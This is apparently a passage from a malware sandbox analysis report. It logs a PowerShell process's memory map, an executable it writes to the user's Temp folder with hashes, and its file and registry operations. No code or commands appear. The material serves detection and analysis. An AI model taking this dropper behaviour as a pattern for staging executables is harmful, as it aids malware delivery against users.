pagefile_0x0000000001d40000	0x01d40000	0x01d40fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001d50000	0x01d50000	0x01d5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001d60000	0x01d60000	0x01d7ffff	Private Memory		Region Actions Download Dump
private_0x0000000001d80000	0x01d80000	0x01dfffff	Private Memory	Readable, Writable	Region Actions Download Dump
l_intl.nls	0x01e00000	0x01e02fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001e10000	0x01e10000	0x01e10fff	Private Memory	Readable, Writable	Region Actions Download Dump
sorttbls.nlp	0x01e20000	0x01e24fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001e30000	0x01e30000	0x01eaffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000001eb0000	0x01eb0000	0x01f8efff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01f90000	0x0225efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000002260000	0x02260000	0x02652fff	Pagefile Backed Memory	Readable	Region Actions
sortkey.nlp	0x02660000	0x026a0fff	Memory Mapped File	Readable	Region Actions
microsoft.wsman.runtime.dll	0x026b0000	0x026b7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000026c0000	0x026c0000	0x0273ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x02740000	0x027a5fff	Memory Mapped File	Readable	Region Actions
private_0x00000000027b0000	0x027b0000	0x0282ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
kernelbase.dll.mui	0x02830000	0x028effff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x00000000028f0000	0x028f0000	0x028f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002900000	0x02900000	0x02900fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002910000	0x02910000	0x0291ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002950000	0x02950000	0x029cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000029d0000	0x029d0000	0x02acffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002ad0000	0x02ad0000	0x02bd0fff	Private Memory	Readable, Writable	Region Actions Download Dump
mscorrc.dll	0x02be0000	0x02c33fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002c40000	0x02c40000	0x02cbffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002cc0000	0x02cc0000	0x1acbffff	Private Memory	Readable, Writable	Region Actions
private_0x000000001acc0000	0x1acc0000	0x1b38ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001b390000	0x1b390000	0x1b48ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000001b500000	0x1b500000	0x1b57ffff	Private Memory	Readable, Writable	Region Actions Download Dump
system.management.automation.dll	0x1b580000	0x1b861fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.dll	0x1e230000	0x1e278fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr80.dll	0x75020000	0x750e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77590000	0x77689fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77690000	0x777aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x777b0000	0x77958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77970000	0x77976fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
powershell.exe	0x13f080000	0x13f0f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
culture.dll	0x642ff4a0000	0x642ff4a9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorwks.dll	0x7fee8290000	0x7fee8c2cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fee9f70000	0x7feea008fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.directoryservices.ni.dll	0x7fef05a0000	0x7fef0734fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.ni.dll	0x7fef0740000	0x7fef08abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.xml.ni.dll	0x7fef08b0000	0x7fef0f54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.management.ni.dll	0x7fef0f60000	0x7fef1077fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.utility.ni.dll	0x7fef1080000	0x7fef1295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.transactions.ni.dll	0x7fef12a0000	0x7fef1384fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.core.ni.dll	0x7fef1390000	0x7fef16bdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.management.automation.ni.dll	0x7fef16c0000	0x7fef221cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.ni.dll	0x7fef2220000	0x7fef2c42fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscorlib.ni.dll	0x7fef2c50000	0x7fef3b2bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef3ba0000	0x7fef3c0efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.wsman.management.ni.dll	0x7fef3e00000	0x7fef3ea9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.security.ni.dll	0x7fef3f70000	0x7fef3fadfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
system.configuration.install.ni.dll	0x7fef3fb0000	0x7fef3fe1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.consolehost.ni.dll	0x7fef3ff0000	0x7fef40a1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
microsoft.powershell.commands.diagnostics.ni.dll	0x7fef40e0000	0x7fef4148fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shfolder.dll	0x7fef4720000	0x7fef4726fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
linkinfo.dll	0x7fef78b0000	0x7fef78bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shdocvw.dll	0x7fef78c0000	0x7fef78f3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntshrui.dll	0x7fef8be0000	0x7fef8c5ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cscapi.dll	0x7fef8c60000	0x7fef8c6efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apphelp.dll	0x7fefa050000	0x7fefa0a6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
slc.dll	0x7fefb3f0000	0x7fefb3fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x7fefb420000	0x7fefb438fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefb8d0000	0x7fefb8fcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefc050000	0x7fefc0a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefc0b0000	0x7fefc1dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefc230000	0x7fefc423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc8c0000	0x7fefc8cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7fefcaa0000	0x7fefcabdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefccf0000	0x7fefcd36fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7fefcff0000	0x7fefd006fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
srvcli.dll	0x7fefd4f0000	0x7fefd512fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7fefd5f0000	0x7fefd5fefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7fefd700000	0x7fefd70efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x7fefd7b0000	0x7fefd7e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7fefd830000	0x7fefd89afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x7fefdab0000	0x7fefdac9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7fefdad0000	0x7fefdbd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7fefdbe0000	0x7fefdc78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7fefdc90000	0x7fefdd66fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7fefdd70000	0x7fefdde0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7fefdf10000	0x7fefdf3dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7fefdf40000	0x7fefdfdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7fefdfe0000	0x7fefe046fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7fefe2b0000	0x7fefe38afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x7fefe4e0000	0x7fefe531fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x7fefe540000	0x7fefe608fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7fefe610000	0x7fefe812fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x7fefe820000	0x7fefe9f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7fefea50000	0x7feff7d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7feff7e0000	0x7feff7fefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7feff800000	0x7feff92cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x7feffab0000	0x7feffabdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x7feffad0000	0x7feffad0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007ff00040000	0x7ff00040000	0x7ff0004ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00050000	0x7ff00050000	0x7ff0005ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00060000	0x7ff00060000	0x7ff000fffff	Private Memory		Region Actions Download Dump
private_0x000007ff00100000	0x7ff00100000	0x7ff0010ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00110000	0x7ff00110000	0x7ff0017ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00180000	0x7ff00180000	0x7ff0018ffff	Private Memory		Region Actions Download Dump
private_0x000007ff00190000	0x7ff00190000	0x7ff0019ffff	Private Memory		Region Actions Download Dump
private_0x000007fffff10000	0x7fffff10000	0x7fffff1ffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x000007fffff20000	0x7fffff20000	0x7fffffaffff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd3fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd4000	0x7fffffd4000	0x7fffffd5fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd6000	0x7fffffd6000	0x7fffffd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffd8000	0x7fffffd8000	0x7fffffd9fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffda000	0x7fffffda000	0x7fffffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffdc000	0x7fffffdc000	0x7fffffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 72 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp13684.exe	210.14 KB (215184 bytes)	MD5: 8f74824751359ce6359876e422c1f8c1 SHA1: 86ec6897a9efbe17cefae3ebe8062a3153bccd6d SHA256: a5aac8cb7ed1e315f16975522723605b3cf27c8676f000be3d65ad6a56daf014		File Actions Show Properties Download

Host Behavior

File (154)

Operation	Filename	Additional Information	Count	Logfile
Create	CONOUT$	desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config	type = file_attributes	3	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml	type = file_attributes	2	Fn
Get Info		type = file_type	12	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml	type = file_attributes	2	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g	type = file_attributes	5	Fn
Get Info	C:\	type = file_attributes	6	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop	type = file_attributes	9	Fn
Get Info	C:\Users	type = file_attributes	4	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\WindowsPowerShell\profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1	type = file_attributes	1	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	type = file_attributes	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	type = file_type	2	Fn
Get Info	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	type = size, size_out = 0	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	type = file_type	2	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	type = file_attributes	3	Fn
Open	STD_INPUT_HANDLE		1	Fn
Read		size = 4096, size_out = 4096	44	Fn Data
Read		size = 4096, size_out = 3315	1	Fn Data
Read		size = 781, size_out = 0	1	Fn
Read		size = 4096, size_out = 0	2	Fn
Read		size = 4096, size_out = 436	1	Fn Data
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 4096	5	Fn Data
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 554	1	Fn Data
Read	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config	size = 4096, size_out = 0	1	Fn
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 4096	5	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 8636	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 4616	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 13068	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 4356	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 40916	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 30752	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 27588	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 6068	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 5808	1	Fn Data
Write	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp13684.exe	size = 52896	1	Fn Data

Registry (211)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment		1	Fn
Open Key	HKEY_CURRENT_USER\Environment		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		9	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell		4	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine		2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance		1	Fn
Open Key	HKEY_CURRENT_USER		1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings		1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Environment	value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	9	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
